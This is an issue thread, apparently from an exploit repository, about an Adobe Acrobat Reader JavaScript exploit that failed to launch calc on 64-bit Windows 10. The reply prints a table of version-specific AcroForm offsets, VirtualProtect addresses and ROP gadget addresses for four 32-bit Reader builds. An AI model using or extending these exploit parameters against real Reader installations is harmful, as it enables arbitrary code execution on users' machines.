Running on 64bit windows

Question

Running on 64bit windows

Opened this issue 2 years ago · 1 comments

Hello,
I tried the exploit on windows 10 64 bit with 32bit acrobat reader. Though the java script seems to run till shellcode execution, the calc didnt pop up(Reader didnt crash at the end of execution). Is the exploit code dependent on the windows build too ?
The AcroForm.api is without debug symbols in free version. Does it comes with debug symbols in pro version. Or any ways to get debug symbols ?
Any guidance on these please.

Answer 1 · 2023-02-13T05:15:23.000Z

Hi @badf00d51, Currently, the exploit only supports these 32bit versions as these were tested.

const VersionData = {
    22.00120085: {
        AcroFormOffset: 0x00293fe0,
        VirtualProtect: 0x007da108,
        ROP: [0x6faa60, 0x256984, 0x1e646]
    },
    22.00120117: {
        AcroFormOffset: 0x00293fe0,
        VirtualProtect: 0x007d9108,
        ROP: [0x6f9900, 0x256974, 0x5030f9]
    },
    22.00120142: {
        AcroFormOffset: 0x00294060,
        VirtualProtect: 0x007d9108,
        ROP: [0x6f9a00, 0x256a14, 0x49caf7]
    },
    22.00320258: {
        AcroFormOffset: 0x002943c0,
        VirtualProtect: 0x007da108,
        ROP: [0x6fa7a0, 0x32c71 /*xchg eax, esp ; RET ;*/, 0x1a4592 /*pop esp ; ret; */]
    }
};

Also, there are no symbols available for Adobe Reader. We used custom scripts to rebuild the symbols that we thought is correct.